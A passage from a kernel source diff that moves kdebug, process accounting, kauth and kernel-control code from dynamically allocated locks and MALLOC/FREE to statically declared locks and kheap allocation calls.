0, &kds_waiter, THREAD_ABORTSAFE); + wait_result = lck_spin_sleep(&kdw_spin_lock, 0, &kds_waiter, THREAD_ABORTSAFE); } kds_waiter = 0; @@ -3377,7 +3353,7 @@ kdbg_wait(uint64_t timeout_ms, bool locked_wait) /* check the count under the spinlock */ bool threshold_exceeded = (kd_ctrl_page.kds_inuse_count >= n_storage_threshold); - lck_spin_unlock(kdw_spin_lock); + lck_spin_unlock(&kdw_spin_lock); ml_set_interrupts_enabled(s); if (!locked_wait) { @@ -3408,13 +3384,13 @@ kdbg_wakeup(void) */ bool s = ml_set_interrupts_enabled(false); - if (lck_spin_try_lock(kdw_spin_lock)) { + if (lck_spin_try_lock(&kdw_spin_lock)) { if (kds_waiter && (kd_ctrl_page.kds_inuse_count >= n_storage_threshold)) { kds_waiter = 0; need_kds_wakeup = true; } - lck_spin_unlock(kdw_spin_lock); + lck_spin_unlock(&kdw_spin_lock); } ml_set_interrupts_enabled(s); @@ -3448,9 +3424,6 @@ kdbg_control(int *name, u_int namelen, user_addr_t where, size_t *sizep) value = name[1]; } - kdbg_lock_init(); - assert(kd_ctrl_page.kdebug_flags & KDBG_LOCKINIT); - ktrace_lock(); /* @@ -4282,8 +4255,6 @@ kdebug_trace_start(unsigned int n_events, const char *filter_desc, ktrace_start_single_threaded(); - kdbg_lock_init(); - ktrace_kernel_configure(KTRACE_KDEBUG); kdbg_set_nkdbufs(n_events); diff --git a/bsd/kern/kern_acct.c b/bsd/kern/kern_acct.c index fd3172f7f..3f662a979 100644 --- a/bsd/kern/kern_acct.c +++ b/bsd/kern/kern_acct.c @@ -115,7 +115,6 @@ */ comp_t encode_comp_t(uint32_t, uint32_t); void acctwatch(void *); -void acct_init(void); /* * Accounting vnode pointer, and suspended accounting vnode pointer. States @@ -139,18 +138,11 @@ int acctresume = 4; /* resume when free space risen to > 4% */ int acctchkfreq = 15; /* frequency (in seconds) to check space */ -static lck_grp_t *acct_subsys_lck_grp; -static lck_mtx_t *acct_subsys_mutex; +static LCK_GRP_DECLARE(acct_subsys_lck_grp, "acct"); +static LCK_MTX_DECLARE(acct_subsys_mutex, &acct_subsys_lck_grp); -#define ACCT_SUBSYS_LOCK() lck_mtx_lock(acct_subsys_mutex) -#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(acct_subsys_mutex) - -void -acct_init(void) -{ - acct_subsys_lck_grp = lck_grp_alloc_init("acct", NULL); - acct_subsys_mutex = lck_mtx_alloc_init(acct_subsys_lck_grp, NULL); -} +#define ACCT_SUBSYS_LOCK() lck_mtx_lock(&acct_subsys_mutex) +#define ACCT_SUBSYS_UNLOCK() lck_mtx_unlock(&acct_subsys_mutex) /* diff --git a/bsd/kern/kern_authorization.c b/bsd/kern/kern_authorization.c index 0181ee93d..a36bc6a51 100644 --- a/bsd/kern/kern_authorization.c +++ b/bsd/kern/kern_authorization.c @@ -57,10 +57,10 @@ * Authorization scopes. */ -lck_grp_t *kauth_lck_grp; -static lck_mtx_t *kauth_scope_mtx; -#define KAUTH_SCOPELOCK() lck_mtx_lock(kauth_scope_mtx); -#define KAUTH_SCOPEUNLOCK() lck_mtx_unlock(kauth_scope_mtx); +LCK_GRP_DECLARE(kauth_lck_grp, "kauth"); +static LCK_MTX_DECLARE(kauth_scope_mtx, &kauth_lck_grp); +#define KAUTH_SCOPELOCK() lck_mtx_lock(&kauth_scope_mtx); +#define KAUTH_SCOPEUNLOCK() lck_mtx_unlock(&kauth_scope_mtx); /* * We support listeners for scopes that have not been registered yet. @@ -92,7 +92,8 @@ struct kauth_local_listener { }; typedef struct kauth_local_listener *kauth_local_listener_t; -static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners; +static TAILQ_HEAD(, kauth_listener) kauth_dangling_listeners = + TAILQ_HEAD_INITIALIZER(kauth_dangling_listeners); /* * Scope listeners need to be reworked to be dynamic. @@ -114,7 +115,7 @@ struct kauth_scope { /* values for kauth_scope.ks_flags */ #define KS_F_HAS_LISTENERS (1 << 0) -static TAILQ_HEAD(, kauth_scope) kauth_scopes; +static TAILQ_HEAD(, kauth_scope) kauth_scopes = TAILQ_HEAD_INITIALIZER(kauth_scopes); static int kauth_add_callback_to_scope(kauth_scope_t sp, kauth_listener_t klp); static void kauth_scope_init(void); @@ -142,35 +143,14 @@ extern void release_pathbuff(char *path); void kauth_init(void) { - lck_grp_attr_t *grp_attributes; - - TAILQ_INIT(&kauth_scopes); - TAILQ_INIT(&kauth_dangling_listeners); - - /* set up our lock group */ - grp_attributes = lck_grp_attr_alloc_init(); - kauth_lck_grp = lck_grp_alloc_init("kauth", grp_attributes); - lck_grp_attr_free(grp_attributes); - /* bring up kauth subsystem components */ kauth_cred_init(); -#if CONFIG_EXT_RESOLVER - kauth_identity_init(); - kauth_groups_init(); -#endif kauth_scope_init(); -#if CONFIG_EXT_RESOLVER - kauth_resolver_init(); -#endif - /* can't alloc locks after this */ - lck_grp_free(kauth_lck_grp); - kauth_lck_grp = NULL; } static void kauth_scope_init(void) { - kauth_scope_mtx = lck_mtx_alloc_init(kauth_lck_grp, 0 /*LCK_ATTR_NULL*/); kauth_scope_process = kauth_register_scope(KAUTH_SCOPE_PROCESS, kauth_authorize_process_callback, NULL); kauth_scope_generic = kauth_register_scope(KAUTH_SCOPE_GENERIC, kauth_authorize_generic_callback, NULL); kauth_scope_fileop = kauth_register_scope(KAUTH_SCOPE_FILEOP, NULL, NULL); @@ -188,7 +168,7 @@ kauth_alloc_scope(const char *identifier, kauth_scope_callback_t callback, void /* * Allocate and populate the scope structure. */ - MALLOC(sp, kauth_scope_t, sizeof(*sp), M_KAUTH, M_WAITOK | M_ZERO); + sp = kheap_alloc(KM_KAUTH, sizeof(*sp), Z_WAITOK | Z_ZERO); if (sp == NULL) { return NULL; } @@ -207,7 +187,7 @@ kauth_alloc_listener(const char *identifier, kauth_scope_callback_t callback, vo /* * Allocate and populate the listener structure. */ - MALLOC(lsp, kauth_listener_t, sizeof(*lsp), M_KAUTH, M_WAITOK); + lsp = kheap_alloc(KM_KAUTH, sizeof(*lsp), Z_WAITOK); if (lsp == NULL) { return NULL; } @@ -236,7 +216,7 @@ kauth_register_scope(const char *identifier, kauth_scope_callback_t callback, vo if (strncmp(tsp->ks_identifier, identifier, strlen(tsp->ks_identifier) + 1) == 0) { KAUTH_SCOPEUNLOCK(); - FREE(sp, M_KAUTH); + kheap_free(KM_KAUTH, sp, sizeof(struct kauth_scope)); return NULL; } } @@ -294,7 +274,7 @@ kauth_deregister_scope(kauth_scope_t scope) } } KAUTH_SCOPEUNLOCK(); - FREE(scope, M_KAUTH); + kheap_free(KM_KAUTH, scope, sizeof(struct kauth_scope)); return; } @@ -323,7 +303,7 @@ kauth_listen_scope(const char *identifier, kauth_scope_callback_t callback, void } /* table already full */ KAUTH_SCOPEUNLOCK(); - FREE(klp, M_KAUTH); + kheap_free(KM_KAUTH, klp, sizeof(struct kauth_listener)); return NULL; } } @@ -367,7 +347,7 @@ kauth_unlisten_scope(kauth_listener_t listener) sp->ks_flags &= ~KS_F_HAS_LISTENERS; } KAUTH_SCOPEUNLOCK(); - FREE(listener, M_KAUTH); + kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener)); return; } } @@ -378,7 +358,7 @@ kauth_unlisten_scope(kauth_listener_t listener) if (klp == listener) { TAILQ_REMOVE(&kauth_dangling_listeners, klp, kl_link); KAUTH_SCOPEUNLOCK(); - FREE(listener, M_KAUTH); + kheap_free(KM_KAUTH, listener, sizeof(struct kauth_listener)); return; } } @@ -1084,7 +1064,7 @@ kauth_filesec_alloc(int count) return NULL; } - MALLOC(fsp, kauth_filesec_t, KAUTH_FILESEC_SIZE(count), M_KAUTH, M_WAITOK); + fsp = kheap_alloc(KM_KAUTH, KAUTH_FILESEC_SIZE(count), Z_WAITOK); if (fsp != NULL) { fsp->fsec_magic = KAUTH_FILESEC_MAGIC; fsp->fsec_owner = kauth_null_guid; @@ -1118,7 +1098,7 @@ kauth_filesec_free(kauth_filesec_t fsp) panic("freeing KAUTH_FILESEC_WANTED"); } #endif - FREE(fsp, M_KAUTH); + kheap_free_addr(KM_KAUTH, fsp); } /* @@ -1206,7 +1186,7 @@ kauth_acl_alloc(int count) return NULL; } - MALLOC(aclp, kauth_acl_t, KAUTH_ACL_SIZE(count), M_KAUTH, M_WAITOK); + aclp = kheap_alloc(KM_KAUTH, KAUTH_ACL_SIZE(count), Z_WAITOK); if (aclp != NULL) { aclp->acl_entrycount = 0; aclp->acl_flags = 0; diff --git a/bsd/kern/kern_control.c b/bsd/kern/kern_control.c index dec9a91a9..1ee265e3d 100644 --- a/bsd/kern/kern_control.c +++ b/bsd/kern/kern_control.c @@ -96,7 +96,7 @@ enum ctl_status { struct ctl_cb { TAILQ_ENTRY(ctl_cb) next; /* controller chain */ - lck_mtx_t *mtx; + lck_mtx_t mtx; struct socket *so; /* controlling socket */ struct kctl *kctl; /* back pointer to controller */ void *userdata; @@ -129,13 +129,12 @@ struct ctl_cb { */ const u_int32_t ctl_maxunit = 65536; -static lck_grp_attr_t *ctl_lck_grp_attr = 0; -static lck_attr_t *ctl_lck_attr = 0; -static lck_grp_t *ctl_lck_grp = 0; -static lck_mtx_t *ctl_mtx; +static LCK_ATTR_DECLARE(ctl_lck_attr, 0, 0); +static LCK_GRP_DECLARE(ctl_lck_grp, "Kernel Control Protocol"); +static LCK_MTX_DECLARE_ATTR(ctl_mtx, &ctl_lck_grp, &ctl_lck_attr); /* all the controllers are chained */ -TAILQ_HEAD(kctl_list, kctl) ctl_head; +TAILQ_HEAD(kctl_list, kctl) ctl_head = TAILQ_HEAD_INITIALIZER(ctl_head); static int ctl_attach(struct socket *, int, struct proc *); static int ctl_detach(struct socket *); @@ -271,32 +270,6 @@ kern_control_init(struct domain *dp) VERIFY(!(dp->dom_flags & DOM_INITIALIZED)); VERIFY(dp == systemdomain); - ctl_lck_grp_attr = lck_grp_attr_alloc_init(); - if (ctl_lck_grp_attr == NULL) { - panic("%s: lck_grp_attr_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_lck_grp = lck_grp_alloc_init("Kernel Control Protocol", - ctl_lck_grp_attr); - if (ctl_lck_grp == NULL) { - panic("%s: lck_grp_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_lck_attr = lck_attr_alloc_init(); - if (ctl_lck_attr == NULL) { - panic("%s: lck_attr_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - - ctl_mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr); - if (ctl_mtx == NULL) { - panic("%s: lck_mtx_alloc_init failed\n", __func__); - /* NOTREACHED */ - } - TAILQ_INIT(&ctl_head); - for (i = 0, pr = &kctlsw[0]; i < kctl_proto_count; i++, pr++) { net_add_proto(pr, dp, 1); } @@ -306,10 +279,8 @@ static void kcb_delete(struct ctl_cb *kcb) { if (kcb != 0) { - if (kcb->mtx != 0) { - lck_mtx_free(kcb->mtx, ctl_lck_grp); - } - FREE(kcb, M_TEMP); + lck_mtx_destroy(&kcb->mtx, &ctl_lck_grp); + kheap_free(KHEAP_DEFAULT, kcb, sizeof(struct ctl_cb)); } } @@ -326,18 +297,13 @@ ctl_attach(struct socket *so, int proto, struct proc *p) int error = 0; struct ctl_cb *kcb = 0; - MALLOC(kcb, struct ctl_cb *, sizeof(struct ctl_cb), M_TEMP, M_WAITOK); + kcb = kheap_alloc(KHEAP_DEFAULT, sizeof(struct ctl_cb), Z_WAITOK | Z_ZERO); if (kcb == NULL) { error = ENOMEM; goto quit; } - bzero(kcb, sizeof(struct ctl_cb)); - kcb->mtx = lck_mtx_alloc_init(ctl_lck_grp, ctl_lck_attr); - if (kcb->mtx == NULL) { - error = ENOMEM; - goto quit; - } + lck_mtx_init(&kcb->mtx, &ctl_lck_grp, &ctl_lck_attr); kcb->so = so; so->so_pcb = (caddr_t)kcb; @@ -359,11 +325,11 @@ ctl_sofreelastref(struct socket *so) if (kcb != 0) { struct kctl *kctl; if ((kctl = kcb->kctl) != 0) { - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } kcb_delete(kcb); } @@ -474,10 +440,10 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) bcopy(nam, &sa, sizeof(struct sockaddr_ctl)); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_id_unit(sa.sc_id, sa.sc_unit); if (kctl == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return ENOENT; } @@ -485,30 +451,30 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) (so->so_type != SOCK_STREAM)) || (!(kctl->flags & CTL_FLAG_REG_SOCK_STREAM) && (so->so_type != SOCK_DGRAM))) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EPROTOTYPE; } if (kctl->flags & CTL_FLAG_PRIVILEGED) { if (p == 0) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EINVAL; } if (kauth_cred_issuser(kauth_cred_get()) == 0) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EPERM; } } if ((kctl->flags & CTL_FLAG_REG_ID_UNIT) || sa.sc_unit != 0) { if (kcb_find(kctl, sa.sc_unit) != NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } } else if (kctl->setup != NULL) { error = (*kctl->setup)(&sa.sc_unit, &kcb->userdata); if (error != 0) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return error; } } else { @@ -527,7 +493,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) } if (unit == ctl_maxunit) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } @@ -544,7 +510,7 @@ ctl_setup_kctl(struct socket *so, struct sockaddr *nam, struct proc *p) kctlstat.kcs_pcbcount++; kctlstat.kcs_gencnt++; kctlstat.kcs_connections++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); /* * rdar://15526688: Limit the send and receive sizes to sb_max @@ -580,14 +546,14 @@ done: #if DEVELOPMENT || DEBUG kcb->status = KCTL_DISCONNECTED; #endif /* DEVELOPMENT || DEBUG */ - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kcb->kctl = NULL; kcb->sac.sc_unit = 0; kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; kctlstat.kcs_conn_fail++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } return error; } @@ -692,14 +658,14 @@ end: #if DEVELOPMENT || DEBUG kcb->status = KCTL_DISCONNECTED; #endif /* DEVELOPMENT || DEBUG */ - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_REMOVE(&kcb->kctl->kcb_head, kcb, next); kcb->kctl = NULL; kcb->sac.sc_unit = 0; kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; kctlstat.kcs_conn_fail++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); } out: ctl_kcb_done_clearing(kcb); @@ -731,16 +697,16 @@ ctl_disconnect(struct socket *so) #endif /* DEVELOPMENT || DEBUG */ socket_unlock(so, 0); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kcb->kctl = 0; kcb->sac.sc_unit = 0; while (kcb->usecount != 0) { - msleep(&kcb->usecount, ctl_mtx, 0, "kcb->usecount", 0); + msleep(&kcb->usecount, &ctl_mtx, 0, "kcb->usecount", 0); } TAILQ_REMOVE(&kctl->kcb_head, kcb, next); kctlstat.kcs_pcbcount--; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_lock(so, 0); ctl_kcb_done_clearing(kcb); ctl_kcb_decrement_use_count(kcb); @@ -1361,6 +1327,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) struct kctl *kctl; int error = 0; void *data = NULL; + size_t data_len = 0; size_t len; if (sopt->sopt_level != SYSPROTO_CONTROL) { @@ -1385,9 +1352,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) goto out; } if (sopt->sopt_valsize != 0) { - MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, - M_WAITOK | M_ZERO); + data_len = sopt->sopt_valsize; + data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO); if (data == NULL) { + data_len = 0; error = ENOMEM; goto out; } @@ -1402,9 +1370,7 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) socket_lock(so, 0); } - if (data != NULL) { - FREE(data, M_TEMP); - } + kheap_free(KHEAP_TEMP, data, data_len); break; case SOPT_GET: @@ -1414,9 +1380,10 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) } if (sopt->sopt_valsize && sopt->sopt_val) { - MALLOC(data, void *, sopt->sopt_valsize, M_TEMP, - M_WAITOK | M_ZERO); + data_len = sopt->sopt_valsize; + data = kheap_alloc(KHEAP_TEMP, data_len, Z_WAITOK | Z_ZERO); if (data == NULL) { + data_len = 0; error = ENOMEM; goto out; } @@ -1449,9 +1416,8 @@ ctl_ctloutput(struct socket *so, struct sockopt *sopt) } } } - if (data != NULL) { - FREE(data, M_TEMP); - } + + kheap_free(KHEAP_TEMP, data, data_len); break; } @@ -1473,10 +1439,10 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, struct kctl *kctl; u_int32_t n = 0; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_FOREACH(kctl, &ctl_head, next) n++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); bcopy(&n, data, sizeof(n)); error = 0; @@ -1494,9 +1460,9 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, error = EINVAL; break; } - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_name(ctl_info.ctl_name); - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (kctl == 0) { error = ENOENT; break; @@ -1514,19 +1480,19 @@ ctl_ioctl(struct socket *so, u_long cmd, caddr_t data, } static void -kctl_tbl_grow() +kctl_tbl_grow(void) { struct kctl **new_table; uintptr_t new_size; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (kctl_tbl_growing) { /* Another thread is allocating */ kctl_tbl_growing_waiting++; do { - (void) msleep((caddr_t) &kctl_tbl_growing, ctl_mtx, + (void) msleep((caddr_t) &kctl_tbl_growing, &ctl_mtx, PSOCK | PCATCH, "kctl_tbl_growing", 0); } while (kctl_tbl_growing); kctl_tbl_growing_waiting--; @@ -1549,17 +1515,18 @@ kctl_tbl_grow() new_size = kctl_tbl_size + KCTL_TBL_INC; - lck_mtx_unlock(ctl_mtx); - new_table = _MALLOC(sizeof(struct kctl *) * new_size, - M_TEMP, M_WAIT | M_ZERO); - lck_mtx_lock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); + new_table = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl *) * new_size, + Z_WAITOK | Z_ZERO); + lck_mtx_lock(&ctl_mtx); if (new_table != NULL) { if (kctl_table != NULL) { bcopy(kctl_table, new_table, kctl_tbl_size * sizeof(struct kctl *)); - _FREE(kctl_table, M_TEMP); + kheap_free(KHEAP_DEFAULT, kctl_table, + sizeof(struct kctl *) * kctl_tbl_size); } kctl_table = new_table; kctl_tbl_size = new_size; @@ -1581,7 +1548,7 @@ kctl_make_ref(struct kctl *kctl) { uintptr_t i; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (kctl_tbl_count >= kctl_tbl_size) { kctl_tbl_grow(); @@ -1632,7 +1599,7 @@ kctl_delete_ref(kern_ctl_ref kctlref) */ uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (i < kctl_tbl_size) { struct kctl *kctl = kctl_table[i]; @@ -1657,7 +1624,7 @@ kctl_from_ref(kern_ctl_ref kctlref) uintptr_t i = (((uintptr_t)kctlref) & KCTLREF_INDEX_MASK) - 1; struct kctl *kctl = NULL; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); if (i >= kctl_tbl_size) { kctlstat.kcs_bad_kctlref++; @@ -1695,17 +1662,16 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) return EINVAL; } - MALLOC(kctl, struct kctl *, sizeof(*kctl), M_TEMP, M_WAITOK); + kctl = kheap_alloc(KHEAP_DEFAULT, sizeof(struct kctl), Z_WAITOK | Z_ZERO); if (kctl == NULL) { return ENOMEM; } - bzero((char *)kctl, sizeof(*kctl)); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if (kctl_make_ref(kctl) == NULL) { - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return ENOMEM; } @@ -1726,8 +1692,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) /* Verify the same name isn't already registered */ if (ctl_find_by_name(userkctl->ctl_name) != NULL) { kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return EEXIST; } @@ -1771,8 +1737,8 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) if (ctl_find_by_id_unit(userkctl->ctl_id, userkctl->ctl_unit)) { kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); - FREE(kctl, M_TEMP); + lck_mtx_unlock(&ctl_mtx); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return EEXIST; } kctl->id = userkctl->ctl_id; @@ -1826,7 +1792,7 @@ ctl_register(struct kern_ctl_reg *userkctl, kern_ctl_ref *kctlref) kctlstat.kcs_reg_count++; kctlstat.kcs_gencnt++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); *kctlref = kctl->kctlref; @@ -1839,10 +1805,10 @@ ctl_deregister(void *kctlref) { struct kctl *kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if ((kctl = kctl_from_ref(kctlref)) == NULL) { kctlstat.kcs_bad_kctlref++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (ctl_debug != 0) { printf("%s invalid kctlref %p\n", __func__, kctlref); @@ -1851,7 +1817,7 @@ ctl_deregister(void *kctlref) } if (!TAILQ_EMPTY(&kctl->kcb_head)) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return EBUSY; } @@ -1861,10 +1827,10 @@ ctl_deregister(void *kctlref) kctlstat.kcs_gencnt++; kctl_delete_ref(kctl->kctlref); - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); ctl_post_msg(KEV_CTL_DEREGISTERED, kctl->id); - FREE(kctl, M_TEMP); + kheap_free(KHEAP_DEFAULT, kctl, sizeof(struct kctl)); return 0; } @@ -1876,7 +1842,7 @@ ctl_find_by_name(const char *name) { struct kctl *kctl; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kctl, &ctl_head, next) if (strncmp(kctl->name, name, sizeof(kctl->name)) == 0) { @@ -1892,12 +1858,12 @@ ctl_id_by_name(const char *name) u_int32_t ctl_id = 0; struct kctl *kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); kctl = ctl_find_by_name(name); if (kctl) { ctl_id = kctl->id; } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return ctl_id; } @@ -1908,7 +1874,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize) int found = 0; struct kctl *kctl; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); TAILQ_FOREACH(kctl, &ctl_head, next) { if (kctl->id == id) { break; @@ -1922,7 +1888,7 @@ ctl_name_by_id(u_int32_t id, char *out_name, size_t maxsize) strlcpy(out_name, kctl->name, maxsize); found = 1; } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return found ? 0 : ENOENT; } @@ -1936,7 +1902,7 @@ ctl_find_by_id_unit(u_int32_t id, u_int32_t unit) { struct kctl *kctl; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kctl, &ctl_head, next) { if (kctl->id == id && (kctl->flags & CTL_FLAG_REG_ID_UNIT) == 0) { @@ -1956,7 +1922,7 @@ kcb_find(struct kctl *kctl, u_int32_t unit) { struct ctl_cb *kcb; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_OWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_OWNED); TAILQ_FOREACH(kcb, &kctl->kcb_head, next) if (kcb->sac.sc_unit == unit) { @@ -1977,13 +1943,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) lr_saved = __builtin_return_address(0); - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); /* * First validate the kctlref */ if ((kctl = kctl_from_ref(kctlref)) == NULL) { kctlstat.kcs_bad_kctlref++; - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); if (ctl_debug != 0) { printf("%s invalid kctlref %p\n", __func__, kctlref); @@ -1993,7 +1959,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) kcb = kcb_find(kctl, unit); if (kcb == NULL || kcb->kctl != kctl || (so = kcb->so) == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return NULL; } /* @@ -2003,7 +1969,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) /* * Respect lock ordering: socket before ctl_mtx */ - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_lock(so, 1); /* @@ -2013,13 +1979,13 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) i = (so->next_lock_lr + SO_LCKDBG_MAX - 1) % SO_LCKDBG_MAX; so->lock_lr[i] = lr_saved; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); if ((kctl = kctl_from_ref(kctlref)) == NULL || kcb->kctl == NULL) { - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); socket_unlock(so, 1); so = NULL; - lck_mtx_lock(ctl_mtx); + lck_mtx_lock(&ctl_mtx); } else if (kctlflags != NULL) { *kctlflags = kctl->flags; } @@ -2029,7 +1995,7 @@ kcb_find_socket(kern_ctl_ref kctlref, u_int32_t unit, u_int32_t *kctlflags) wakeup((event_t)&kcb->usecount); } - lck_mtx_unlock(ctl_mtx); + lck_mtx_unlock(&ctl_mtx); return so; } @@ -2040,7 +2006,7 @@ ctl_post_msg(u_int32_t event_code, u_int32_t id) struct ctl_event_data ctl_ev_data; struct kev_msg ev_msg; - lck_mtx_assert(ctl_mtx, LCK_MTX_ASSERT_NOTOWNED); + lck_mtx_assert(&ctl_mtx, LCK_MTX_ASSERT_NOTOWNED); bzero(&ev_msg, sizeof(struct kev_msg)); ev_msg.vendor_code = KEV_VENDOR_APPLE; @@ -2072,7 +2038,7 @@ ctl_lock(struct socket *so, int refcount, void *lr) } if (so->so_pcb != NULL) { - lck_mtx_lock(((struct ctl_cb *)so->so_pcb)->mtx); + lck_mtx_lock(&((struct ctl_cb *)so->so_pcb)->mtx); } else { panic("ctl_lock: so=%p NO PCB! lr=%p lrh= %s\n", so, lr_saved, solockhistory_nr(so)); @@ -2111,7 +2077,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr) printf("ctl_unlock: so=%llx sopcb=%x lock=%llx ref=%u lr=%llx\n", (uint64_t)VM_KERNEL_ADDRPERM(so), (uint64_t)VM_KERNEL_ADDRPERM(so->so_pcb, - (uint64_t)VM_KERNEL_ADDRPERM(((struct ctl_cb *)so->so_pcb)->mtx), + (uint64_t)VM_KERNEL_ADDRPERM(&((struct ctl_cb *)so->so_pcb)->mtx), so->so_usecount, (uint64_t)VM_KERNEL_ADDRPERM(lr_saved)); #endif /* (MORE_KCTLLOCK_DEBUG && (DEVELOPMENT || DEBUG)) */ if (refcount) { @@ -2129,7 +2095,7 @@ ctl_unlock(struct socket *so, int refcount, void *lr) solockhistory_nr(so)); /* NOTREACHED */ } - 